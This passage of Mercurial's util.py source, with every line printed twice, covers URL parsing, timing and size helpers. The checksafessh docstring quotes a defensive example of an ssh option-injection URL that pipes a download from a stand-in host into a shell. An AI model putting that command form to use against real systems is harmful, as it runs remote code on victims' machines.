2691 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2691 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2692 '0': False, 'no': False, 'false': False, 'off': False,
2692 '0': False, 'no': False, 'false': False, 'off': False,
2693 'never': False}
2693 'never': False}
2694
2694
2695 def parsebool(s):
2695 def parsebool(s):
2696 """Parse s into a boolean.
2696 """Parse s into a boolean.
2697
2697
2698 If s is not a valid boolean, returns None.
2698 If s is not a valid boolean, returns None.
2699 """
2699 """
2700 return _booleans.get(s.lower(), None)
2700 return _booleans.get(s.lower(), None)
2701
2701
2702 _hextochr = dict((a + b, chr(int(a + b, 16)))
2702 _hextochr = dict((a + b, chr(int(a + b, 16)))
2703 for a in string.hexdigits for b in string.hexdigits)
2703 for a in string.hexdigits for b in string.hexdigits)
2704
2704
2705 class url(object):
2705 class url(object):
2706 r"""Reliable URL parser.
2706 r"""Reliable URL parser.
2707
2707
2708 This parses URLs and provides attributes for the following
2708 This parses URLs and provides attributes for the following
2709 components:
2709 components:
2710
2710
2711 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2711 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2712
2712
2713 Missing components are set to None. The only exception is
2713 Missing components are set to None. The only exception is
2714 fragment, which is set to '' if present but empty.
2714 fragment, which is set to '' if present but empty.
2715
2715
2716 If parsefragment is False, fragment is included in query. If
2716 If parsefragment is False, fragment is included in query. If
2717 parsequery is False, query is included in path. If both are
2717 parsequery is False, query is included in path. If both are
2718 False, both fragment and query are included in path.
2718 False, both fragment and query are included in path.
2719
2719
2720 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2720 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2721
2721
2722 Note that for backward compatibility reasons, bundle URLs do not
2722 Note that for backward compatibility reasons, bundle URLs do not
2723 take host names. That means 'bundle://../' has a path of '../'.
2723 take host names. That means 'bundle://../' has a path of '../'.
2724
2724
2725 Examples:
2725 Examples:
2726
2726
2727 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2727 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2728 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2728 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2729 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2729 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2730 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2730 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2731 >>> url(b'file:///home/joe/repo')
2731 >>> url(b'file:///home/joe/repo')
2732 <url scheme: 'file', path: '/home/joe/repo'>
2732 <url scheme: 'file', path: '/home/joe/repo'>
2733 >>> url(b'file:///c:/temp/foo/')
2733 >>> url(b'file:///c:/temp/foo/')
2734 <url scheme: 'file', path: 'c:/temp/foo/'>
2734 <url scheme: 'file', path: 'c:/temp/foo/'>
2735 >>> url(b'bundle:foo')
2735 >>> url(b'bundle:foo')
2736 <url scheme: 'bundle', path: 'foo'>
2736 <url scheme: 'bundle', path: 'foo'>
2737 >>> url(b'bundle://../foo')
2737 >>> url(b'bundle://../foo')
2738 <url scheme: 'bundle', path: '../foo'>
2738 <url scheme: 'bundle', path: '../foo'>
2739 >>> url(br'c:\foo\bar')
2739 >>> url(br'c:\foo\bar')
2740 <url path: 'c:\\foo\\bar'>
2740 <url path: 'c:\\foo\\bar'>
2741 >>> url(br'\\blah\blah\blah')
2741 >>> url(br'\\blah\blah\blah')
2742 <url path: '\\\\blah\\blah\\blah'>
2742 <url path: '\\\\blah\\blah\\blah'>
2743 >>> url(br'\\blah\blah\blah#baz')
2743 >>> url(br'\\blah\blah\blah#baz')
2744 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2744 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2745 >>> url(br'file:///C:\users\me')
2745 >>> url(br'file:///C:\users\me')
2746 <url scheme: 'file', path: 'C:\\users\\me'>
2746 <url scheme: 'file', path: 'C:\\users\\me'>
2747
2747
2748 Authentication credentials:
2748 Authentication credentials:
2749
2749
2750 >>> url(b'ssh://joe:xyz@x/repo')
2750 >>> url(b'ssh://joe:xyz@x/repo')
2751 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2751 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2752 >>> url(b'ssh://joe@x/repo')
2752 >>> url(b'ssh://joe@x/repo')
2753 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2753 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2754
2754
2755 Query strings and fragments:
2755 Query strings and fragments:
2756
2756
2757 >>> url(b'http://host/a?b#c')
2757 >>> url(b'http://host/a?b#c')
2758 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2758 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2759 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2759 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2760 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2760 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2761
2761
2762 Empty path:
2762 Empty path:
2763
2763
2764 >>> url(b'')
2764 >>> url(b'')
2765 <url path: ''>
2765 <url path: ''>
2766 >>> url(b'#a')
2766 >>> url(b'#a')
2767 <url path: '', fragment: 'a'>
2767 <url path: '', fragment: 'a'>
2768 >>> url(b'http://host/')
2768 >>> url(b'http://host/')
2769 <url scheme: 'http', host: 'host', path: ''>
2769 <url scheme: 'http', host: 'host', path: ''>
2770 >>> url(b'http://host/#a')
2770 >>> url(b'http://host/#a')
2771 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2771 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2772
2772
2773 Only scheme:
2773 Only scheme:
2774
2774
2775 >>> url(b'http:')
2775 >>> url(b'http:')
2776 <url scheme: 'http'>
2776 <url scheme: 'http'>
2777 """
2777 """
2778
2778
2779 _safechars = "!~*'()+"
2779 _safechars = "!~*'()+"
2780 _safepchars = "/!~*'()+:\\"
2780 _safepchars = "/!~*'()+:\\"
2781 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2781 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2782
2782
2783 def __init__(self, path, parsequery=True, parsefragment=True):
2783 def __init__(self, path, parsequery=True, parsefragment=True):
2784 # We slowly chomp away at path until we have only the path left
2784 # We slowly chomp away at path until we have only the path left
2785 self.scheme = self.user = self.passwd = self.host = None
2785 self.scheme = self.user = self.passwd = self.host = None
2786 self.port = self.path = self.query = self.fragment = None
2786 self.port = self.path = self.query = self.fragment = None
2787 self._localpath = True
2787 self._localpath = True
2788 self._hostport = ''
2788 self._hostport = ''
2789 self._origpath = path
2789 self._origpath = path
2790
2790
2791 if parsefragment and '#' in path:
2791 if parsefragment and '#' in path:
2792 path, self.fragment = path.split('#', 1)
2792 path, self.fragment = path.split('#', 1)
2793
2793
2794 # special case for Windows drive letters and UNC paths
2794 # special case for Windows drive letters and UNC paths
2795 if hasdriveletter(path) or path.startswith('\\\\'):
2795 if hasdriveletter(path) or path.startswith('\\\\'):
2796 self.path = path
2796 self.path = path
2797 return
2797 return
2798
2798
2799 # For compatibility reasons, we can't handle bundle paths as
2799 # For compatibility reasons, we can't handle bundle paths as
2800 # normal URLS
2800 # normal URLS
2801 if path.startswith('bundle:'):
2801 if path.startswith('bundle:'):
2802 self.scheme = 'bundle'
2802 self.scheme = 'bundle'
2803 path = path[7:]
2803 path = path[7:]
2804 if path.startswith('//'):
2804 if path.startswith('//'):
2805 path = path[2:]
2805 path = path[2:]
2806 self.path = path
2806 self.path = path
2807 return
2807 return
2808
2808
2809 if self._matchscheme(path):
2809 if self._matchscheme(path):
2810 parts = path.split(':', 1)
2810 parts = path.split(':', 1)
2811 if parts[0]:
2811 if parts[0]:
2812 self.scheme, path = parts
2812 self.scheme, path = parts
2813 self._localpath = False
2813 self._localpath = False
2814
2814
2815 if not path:
2815 if not path:
2816 path = None
2816 path = None
2817 if self._localpath:
2817 if self._localpath:
2818 self.path = ''
2818 self.path = ''
2819 return
2819 return
2820 else:
2820 else:
2821 if self._localpath:
2821 if self._localpath:
2822 self.path = path
2822 self.path = path
2823 return
2823 return
2824
2824
2825 if parsequery and '?' in path:
2825 if parsequery and '?' in path:
2826 path, self.query = path.split('?', 1)
2826 path, self.query = path.split('?', 1)
2827 if not path:
2827 if not path:
2828 path = None
2828 path = None
2829 if not self.query:
2829 if not self.query:
2830 self.query = None
2830 self.query = None
2831
2831
2832 # // is required to specify a host/authority
2832 # // is required to specify a host/authority
2833 if path and path.startswith('//'):
2833 if path and path.startswith('//'):
2834 parts = path[2:].split('/', 1)
2834 parts = path[2:].split('/', 1)
2835 if len(parts) > 1:
2835 if len(parts) > 1:
2836 self.host, path = parts
2836 self.host, path = parts
2837 else:
2837 else:
2838 self.host = parts[0]
2838 self.host = parts[0]
2839 path = None
2839 path = None
2840 if not self.host:
2840 if not self.host:
2841 self.host = None
2841 self.host = None
2842 # path of file:///d is /d
2842 # path of file:///d is /d
2843 # path of file:///d:/ is d:/, not /d:/
2843 # path of file:///d:/ is d:/, not /d:/
2844 if path and not hasdriveletter(path):
2844 if path and not hasdriveletter(path):
2845 path = '/' + path
2845 path = '/' + path
2846
2846
2847 if self.host and '@' in self.host:
2847 if self.host and '@' in self.host:
2848 self.user, self.host = self.host.rsplit('@', 1)
2848 self.user, self.host = self.host.rsplit('@', 1)
2849 if ':' in self.user:
2849 if ':' in self.user:
2850 self.user, self.passwd = self.user.split(':', 1)
2850 self.user, self.passwd = self.user.split(':', 1)
2851 if not self.host:
2851 if not self.host:
2852 self.host = None
2852 self.host = None
2853
2853
2854 # Don't split on colons in IPv6 addresses without ports
2854 # Don't split on colons in IPv6 addresses without ports
2855 if (self.host and ':' in self.host and
2855 if (self.host and ':' in self.host and
2856 not (self.host.startswith('[') and self.host.endswith(']'))):
2856 not (self.host.startswith('[') and self.host.endswith(']'))):
2857 self._hostport = self.host
2857 self._hostport = self.host
2858 self.host, self.port = self.host.rsplit(':', 1)
2858 self.host, self.port = self.host.rsplit(':', 1)
2859 if not self.host:
2859 if not self.host:
2860 self.host = None
2860 self.host = None
2861
2861
2862 if (self.host and self.scheme == 'file' and
2862 if (self.host and self.scheme == 'file' and
2863 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2863 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2864 raise Abort(_('file:// URLs can only refer to localhost'))
2864 raise Abort(_('file:// URLs can only refer to localhost'))
2865
2865
2866 self.path = path
2866 self.path = path
2867
2867
2868 # leave the query string escaped
2868 # leave the query string escaped
2869 for a in ('user', 'passwd', 'host', 'port',
2869 for a in ('user', 'passwd', 'host', 'port',
2870 'path', 'fragment'):
2870 'path', 'fragment'):
2871 v = getattr(self, a)
2871 v = getattr(self, a)
2872 if v is not None:
2872 if v is not None:
2873 setattr(self, a, urlreq.unquote(v))
2873 setattr(self, a, urlreq.unquote(v))
2874
2874
2875 @encoding.strmethod
2875 @encoding.strmethod
2876 def __repr__(self):
2876 def __repr__(self):
2877 attrs = []
2877 attrs = []
2878 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2878 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2879 'query', 'fragment'):
2879 'query', 'fragment'):
2880 v = getattr(self, a)
2880 v = getattr(self, a)
2881 if v is not None:
2881 if v is not None:
2882 attrs.append('%s: %r' % (a, v))
2882 attrs.append('%s: %r' % (a, v))
2883 return '<url %s>' % ', '.join(attrs)
2883 return '<url %s>' % ', '.join(attrs)
2884
2884
2885 def __bytes__(self):
2885 def __bytes__(self):
2886 r"""Join the URL's components back into a URL string.
2886 r"""Join the URL's components back into a URL string.
2887
2887
2888 Examples:
2888 Examples:
2889
2889
2890 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2890 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2891 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2891 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2892 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2892 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2893 'http://user:pw@host:80/?foo=bar&baz=42'
2893 'http://user:pw@host:80/?foo=bar&baz=42'
2894 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2894 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2895 'http://user:pw@host:80/?foo=bar%3dbaz'
2895 'http://user:pw@host:80/?foo=bar%3dbaz'
2896 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2896 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2897 'ssh://user:pw@[::1]:2200//home/joe#'
2897 'ssh://user:pw@[::1]:2200//home/joe#'
2898 >>> bytes(url(b'http://localhost:80//'))
2898 >>> bytes(url(b'http://localhost:80//'))
2899 'http://localhost:80//'
2899 'http://localhost:80//'
2900 >>> bytes(url(b'http://localhost:80/'))
2900 >>> bytes(url(b'http://localhost:80/'))
2901 'http://localhost:80/'
2901 'http://localhost:80/'
2902 >>> bytes(url(b'http://localhost:80'))
2902 >>> bytes(url(b'http://localhost:80'))
2903 'http://localhost:80/'
2903 'http://localhost:80/'
2904 >>> bytes(url(b'bundle:foo'))
2904 >>> bytes(url(b'bundle:foo'))
2905 'bundle:foo'
2905 'bundle:foo'
2906 >>> bytes(url(b'bundle://../foo'))
2906 >>> bytes(url(b'bundle://../foo'))
2907 'bundle:../foo'
2907 'bundle:../foo'
2908 >>> bytes(url(b'path'))
2908 >>> bytes(url(b'path'))
2909 'path'
2909 'path'
2910 >>> bytes(url(b'file:///tmp/foo/bar'))
2910 >>> bytes(url(b'file:///tmp/foo/bar'))
2911 'file:///tmp/foo/bar'
2911 'file:///tmp/foo/bar'
2912 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2912 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2913 'file:///c:/tmp/foo/bar'
2913 'file:///c:/tmp/foo/bar'
2914 >>> print(url(br'bundle:foo\bar'))
2914 >>> print(url(br'bundle:foo\bar'))
2915 bundle:foo\bar
2915 bundle:foo\bar
2916 >>> print(url(br'file:///D:\data\hg'))
2916 >>> print(url(br'file:///D:\data\hg'))
2917 file:///D:\data\hg
2917 file:///D:\data\hg
2918 """
2918 """
2919 if self._localpath:
2919 if self._localpath:
2920 s = self.path
2920 s = self.path
2921 if self.scheme == 'bundle':
2921 if self.scheme == 'bundle':
2922 s = 'bundle:' + s
2922 s = 'bundle:' + s
2923 if self.fragment:
2923 if self.fragment:
2924 s += '#' + self.fragment
2924 s += '#' + self.fragment
2925 return s
2925 return s
2926
2926
2927 s = self.scheme + ':'
2927 s = self.scheme + ':'
2928 if self.user or self.passwd or self.host:
2928 if self.user or self.passwd or self.host:
2929 s += '//'
2929 s += '//'
2930 elif self.scheme and (not self.path or self.path.startswith('/')
2930 elif self.scheme and (not self.path or self.path.startswith('/')
2931 or hasdriveletter(self.path)):
2931 or hasdriveletter(self.path)):
2932 s += '//'
2932 s += '//'
2933 if hasdriveletter(self.path):
2933 if hasdriveletter(self.path):
2934 s += '/'
2934 s += '/'
2935 if self.user:
2935 if self.user:
2936 s += urlreq.quote(self.user, safe=self._safechars)
2936 s += urlreq.quote(self.user, safe=self._safechars)
2937 if self.passwd:
2937 if self.passwd:
2938 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2938 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2939 if self.user or self.passwd:
2939 if self.user or self.passwd:
2940 s += '@'
2940 s += '@'
2941 if self.host:
2941 if self.host:
2942 if not (self.host.startswith('[') and self.host.endswith(']')):
2942 if not (self.host.startswith('[') and self.host.endswith(']')):
2943 s += urlreq.quote(self.host)
2943 s += urlreq.quote(self.host)
2944 else:
2944 else:
2945 s += self.host
2945 s += self.host
2946 if self.port:
2946 if self.port:
2947 s += ':' + urlreq.quote(self.port)
2947 s += ':' + urlreq.quote(self.port)
2948 if self.host:
2948 if self.host:
2949 s += '/'
2949 s += '/'
2950 if self.path:
2950 if self.path:
2951 # TODO: similar to the query string, we should not unescape the
2951 # TODO: similar to the query string, we should not unescape the
2952 # path when we store it, the path might contain '%2f' = '/',
2952 # path when we store it, the path might contain '%2f' = '/',
2953 # which we should *not* escape.
2953 # which we should *not* escape.
2954 s += urlreq.quote(self.path, safe=self._safepchars)
2954 s += urlreq.quote(self.path, safe=self._safepchars)
2955 if self.query:
2955 if self.query:
2956 # we store the query in escaped form.
2956 # we store the query in escaped form.
2957 s += '?' + self.query
2957 s += '?' + self.query
2958 if self.fragment is not None:
2958 if self.fragment is not None:
2959 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2959 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2960 return s
2960 return s
2961
2961
2962 __str__ = encoding.strmethod(__bytes__)
2962 __str__ = encoding.strmethod(__bytes__)
2963
2963
2964 def authinfo(self):
2964 def authinfo(self):
2965 user, passwd = self.user, self.passwd
2965 user, passwd = self.user, self.passwd
2966 try:
2966 try:
2967 self.user, self.passwd = None, None
2967 self.user, self.passwd = None, None
2968 s = bytes(self)
2968 s = bytes(self)
2969 finally:
2969 finally:
2970 self.user, self.passwd = user, passwd
2970 self.user, self.passwd = user, passwd
2971 if not self.user:
2971 if not self.user:
2972 return (s, None)
2972 return (s, None)
2973 # authinfo[1] is passed to urllib2 password manager, and its
2973 # authinfo[1] is passed to urllib2 password manager, and its
2974 # URIs must not contain credentials. The host is passed in the
2974 # URIs must not contain credentials. The host is passed in the
2975 # URIs list because Python < 2.4.3 uses only that to search for
2975 # URIs list because Python < 2.4.3 uses only that to search for
2976 # a password.
2976 # a password.
2977 return (s, (None, (s, self.host),
2977 return (s, (None, (s, self.host),
2978 self.user, self.passwd or ''))
2978 self.user, self.passwd or ''))
2979
2979
2980 def isabs(self):
2980 def isabs(self):
2981 if self.scheme and self.scheme != 'file':
2981 if self.scheme and self.scheme != 'file':
2982 return True # remote URL
2982 return True # remote URL
2983 if hasdriveletter(self.path):
2983 if hasdriveletter(self.path):
2984 return True # absolute for our purposes - can't be joined()
2984 return True # absolute for our purposes - can't be joined()
2985 if self.path.startswith(br'\\'):
2985 if self.path.startswith(br'\\'):
2986 return True # Windows UNC path
2986 return True # Windows UNC path
2987 if self.path.startswith('/'):
2987 if self.path.startswith('/'):
2988 return True # POSIX-style
2988 return True # POSIX-style
2989 return False
2989 return False
2990
2990
2991 def localpath(self):
2991 def localpath(self):
2992 if self.scheme == 'file' or self.scheme == 'bundle':
2992 if self.scheme == 'file' or self.scheme == 'bundle':
2993 path = self.path or '/'
2993 path = self.path or '/'
2994 # For Windows, we need to promote hosts containing drive
2994 # For Windows, we need to promote hosts containing drive
2995 # letters to paths with drive letters.
2995 # letters to paths with drive letters.
2996 if hasdriveletter(self._hostport):
2996 if hasdriveletter(self._hostport):
2997 path = self._hostport + '/' + self.path
2997 path = self._hostport + '/' + self.path
2998 elif (self.host is not None and self.path
2998 elif (self.host is not None and self.path
2999 and not hasdriveletter(path)):
2999 and not hasdriveletter(path)):
3000 path = '/' + path
3000 path = '/' + path
3001 return path
3001 return path
3002 return self._origpath
3002 return self._origpath
3003
3003
3004 def islocal(self):
3004 def islocal(self):
3005 '''whether localpath will return something that posixfile can open'''
3005 '''whether localpath will return something that posixfile can open'''
3006 return (not self.scheme or self.scheme == 'file'
3006 return (not self.scheme or self.scheme == 'file'
3007 or self.scheme == 'bundle')
3007 or self.scheme == 'bundle')
3008
3008
3009 def hasscheme(path):
3009 def hasscheme(path):
3010 return bool(url(path).scheme)
3010 return bool(url(path).scheme)
3011
3011
3012 def hasdriveletter(path):
3012 def hasdriveletter(path):
3013 return path and path[1:2] == ':' and path[0:1].isalpha()
3013 return path and path[1:2] == ':' and path[0:1].isalpha()
3014
3014
3015 def urllocalpath(path):
3015 def urllocalpath(path):
3016 return url(path, parsequery=False, parsefragment=False).localpath()
3016 return url(path, parsequery=False, parsefragment=False).localpath()
3017
3017
3018 def checksafessh(path):
3018 def checksafessh(path):
3019 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3019 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3020
3020
3021 This is a sanity check for ssh urls. ssh will parse the first item as
3021 This is a sanity check for ssh urls. ssh will parse the first item as
3022 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3022 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3023 Let's prevent these potentially exploited urls entirely and warn the
3023 Let's prevent these potentially exploited urls entirely and warn the
3024 user.
3024 user.
3025
3025
3026 Raises an error.Abort when the url is unsafe.
3026 Raises an error.Abort when the url is unsafe.
3027 """
3027 """
3028 path = urlreq.unquote(path)
3028 path = urlreq.unquote(path)
3029 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3029 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3030 raise error.Abort(_('potentially unsafe url: %r') %
3030 raise error.Abort(_('potentially unsafe url: %r') %
3031 (path,))
3031 (path,))
3032
3032
3033 def hidepassword(u):
3033 def hidepassword(u):
3034 '''hide user credential in a url string'''
3034 '''hide user credential in a url string'''
3035 u = url(u)
3035 u = url(u)
3036 if u.passwd:
3036 if u.passwd:
3037 u.passwd = '***'
3037 u.passwd = '***'
3038 return bytes(u)
3038 return bytes(u)
3039
3039
3040 def removeauth(u):
3040 def removeauth(u):
3041 '''remove all authentication information from a url string'''
3041 '''remove all authentication information from a url string'''
3042 u = url(u)
3042 u = url(u)
3043 u.user = u.passwd = None
3043 u.user = u.passwd = None
3044 return str(u)
3044 return str(u)
3045
3045
3046 timecount = unitcountfn(
3046 timecount = unitcountfn(
3047 (1, 1e3, _('%.0f s')),
3047 (1, 1e3, _('%.0f s')),
3048 (100, 1, _('%.1f s')),
3048 (100, 1, _('%.1f s')),
3049 (10, 1, _('%.2f s')),
3049 (10, 1, _('%.2f s')),
3050 (1, 1, _('%.3f s')),
3050 (1, 1, _('%.3f s')),
3051 (100, 0.001, _('%.1f ms')),
3051 (100, 0.001, _('%.1f ms')),
3052 (10, 0.001, _('%.2f ms')),
3052 (10, 0.001, _('%.2f ms')),
3053 (1, 0.001, _('%.3f ms')),
3053 (1, 0.001, _('%.3f ms')),
3054 (100, 0.000001, _('%.1f us')),
3054 (100, 0.000001, _('%.1f us')),
3055 (10, 0.000001, _('%.2f us')),
3055 (10, 0.000001, _('%.2f us')),
3056 (1, 0.000001, _('%.3f us')),
3056 (1, 0.000001, _('%.3f us')),
3057 (100, 0.000000001, _('%.1f ns')),
3057 (100, 0.000000001, _('%.1f ns')),
3058 (10, 0.000000001, _('%.2f ns')),
3058 (10, 0.000000001, _('%.2f ns')),
3059 (1, 0.000000001, _('%.3f ns')),
3059 (1, 0.000000001, _('%.3f ns')),
3060 )
3060 )
3061
3061
3062 _timenesting = [0]
3062 _timenesting = [0]
3063
3063
3064 def timed(func):
3064 def timed(func):
3065 '''Report the execution time of a function call to stderr.
3065 '''Report the execution time of a function call to stderr.
3066
3066
3067 During development, use as a decorator when you need to measure
3067 During development, use as a decorator when you need to measure
3068 the cost of a function, e.g. as follows:
3068 the cost of a function, e.g. as follows:
3069
3069
3070 @util.timed
3070 @util.timed
3071 def foo(a, b, c):
3071 def foo(a, b, c):
3072 pass
3072 pass
3073 '''
3073 '''
3074
3074
3075 def wrapper(*args, **kwargs):
3075 def wrapper(*args, **kwargs):
3076 start = timer()
3076 start = timer()
3077 indent = 2
3077 indent = 2
3078 _timenesting[0] += indent
3078 _timenesting[0] += indent
3079 try:
3079 try:
3080 return func(*args, **kwargs)
3080 return func(*args, **kwargs)
3081 finally:
3081 finally:
3082 elapsed = timer() - start
3082 elapsed = timer() - start
3083 _timenesting[0] -= indent
3083 _timenesting[0] -= indent
3084 stderr.write('%s%s: %s\n' %
3084 stderr.write('%s%s: %s\n' %
3085 (' ' * _timenesting[0], func.__name__,
3085 (' ' * _timenesting[0], func.__name__,
3086 timecount(elapsed)))
3086 timecount(elapsed)))
3087 return wrapper
3087 return wrapper
3088
3088
3089 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3089 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3090 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3090 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3091
3091
3092 def sizetoint(s):
3092 def sizetoint(s):
3093 '''Convert a space specifier to a byte count.
3093 '''Convert a space specifier to a byte count.
3094
3094
3095 >>> sizetoint(b'30')
3095 >>> sizetoint(b'30')
3096 30
3096 30
3097 >>> sizetoint(b'2.2kb')
3097 >>> sizetoint(b'2.2kb')
3098 2252
3098 2252
3099 >>> sizetoint(b'6M')
3099 >>> sizetoint(b'6M')
3100 6291456
3100 6291456
3101 '''
3101 '''
3102 t = s.strip().lower()
3102 t = s.strip().lower()
3103 try:
3103 try:
3104 for k, u in _sizeunits:
3104 for k, u in _sizeunits:
3105 if t.endswith(k):
3105 if t.endswith(k):
3106 return int(float(t[:-len(k)]) * u)
3106 return int(float(t[:-len(k)]) * u)
3107 return int(t)
3107 return int(t)
3108 except ValueError:
3108 except ValueError:
3109 raise error.ParseError(_("couldn't parse size: %s") % s)
3109 raise error.ParseError(_("couldn't parse size: %s") % s)
3110
3110
3111 class hooks(object):
3111 class hooks(object):
3112 '''A collection of hook functions that can be used to extend a
3112 '''A collection of hook functions that can be used to extend a
3113 function's behavior. Hooks are called in lexicographic order,
3113 function's behavior. Hooks are called in lexicographic order,
3114 based on the names of their sources.'''
3114 based on the names of their sources.'''
3115
3115
3116 def __init__(self):
3116 def __init__(self):
3117 self._hooks = []
3117 self._hooks = []
3118
3118
3119 def add(self, source, hook):
3119 def add(self, source, hook):
3120 self._hooks.append((source, hook))
3120 self._hooks.append((source, hook))
3121
3121
3122 def __call__(self, *args):
3122 def __call__(self, *args):
3123 self._hooks.sort(key=lambda x: x[0])
3123 self._hooks.sort(key=lambda x: x[0])
3124 results = []
3124 results = []
3125 for source, hook in self._hooks:
3125 for source, hook in self._hooks:
3126 results.append(hook(*args))
3126 results.append(hook(*args))
3127 return results
3127 return results
3128
3128
3129 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3129 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3130 '''Yields lines for a nicely formatted stacktrace.
3130 '''Yields lines for a nicely formatted stacktrace.
3131 Skips the 'skip' last entries, then return the last 'depth' entries.
3131 Skips the 'skip' last entries, then return the last 'depth' entries.
3132 Each file+linenumber is formatted according to fileline.
3132 Each file+linenumber is formatted according to fileline.
3133 Each line is formatted according to line.
3133 Each line is formatted according to line.
3134 If line is None, it yields:
3134 If line is None, it yields:
3135 length of longest filepath+line number,
3135 length of longest filepath+line number,
3136 filepath+linenumber,
3136 filepath+linenumber,
3137 function
3137 function
3138
3138
3139 Not be used in production code but very convenient while developing.
3139 Not be used in production code but very convenient while developing.
3140 '''
3140 '''
3141 entries = [(fileline % (fn, ln), func)
3141 entries = [(fileline % (fn, ln), func)
3142 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3142 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3143 ][-depth:]
3143 ][-depth:]
3144 if entries:
3144 if entries:
3145 fnmax = max(len(entry[0]) for entry in entries)
3145 fnmax = max(len(entry[0]) for entry in entries)
3146 for fnln, func in entries:
3146 for fnln, func in entries:
3147 if line is None:
3147 if line is None:
3148 yield (fnmax, fnln, func)
3148 yield (fnmax, fnln, func)
3149 else:
3149 else:
3150 yield line % (fnmax, fnln, func)
3150 yield line % (fnmax, fnln, func)
3151
3151
3152 def debugstacktrace(msg='stacktrace', skip=0,
3152 def debugstacktrace(msg='stacktrace', skip=0,
3153 f=stderr, otherf=stdout, depth=0):
3153 f=stderr, otherf=stdout, depth=0):
3154 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3154 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3155 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3155 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3156 By default it will flush stdout first.
3156 By default it will flush stdout first.
3157 It can be used everywhere and intentionally does not require an ui object.
3157 It can be used everywhere and intentionally does not require an ui object.
3158 Not be used in production code but very convenient while developing.
3158 Not be used in production code but very convenient while developing.
3159 '''
3159 '''
3160 if otherf:
3160 if otherf:
3161 otherf.flush()
3161 otherf.flush()
3162 f.write('%s at:\n' % msg.rstrip())
3162 f.write('%s at:\n' % msg.rstrip())
3163 for line in getstackframes(skip + 1, depth=depth):
3163 for line in getstackframes(skip + 1, depth=depth):
3164 f.write(line)
3164 f.write(line)
3165 f.flush()
3165 f.flush()
3166
3166
3167 class dirs(object):
3167 class dirs(object):
3168 '''a multiset of directory names from a dirstate or manifest'''
3168 '''a multiset of directory names from a dirstate or manifest'''
3169
3169
3170 def __init__(self, map, skip=None):
3170 def __init__(self, map, skip=None):
3171 self._dirs = {}
3171 self._dirs = {}
3172 addpath = self.addpath
3172 addpath = self.addpath
3173 if safehasattr(map, 'iteritems') and skip is not None:
3173 if safehasattr(map, 'iteritems') and skip is not None:
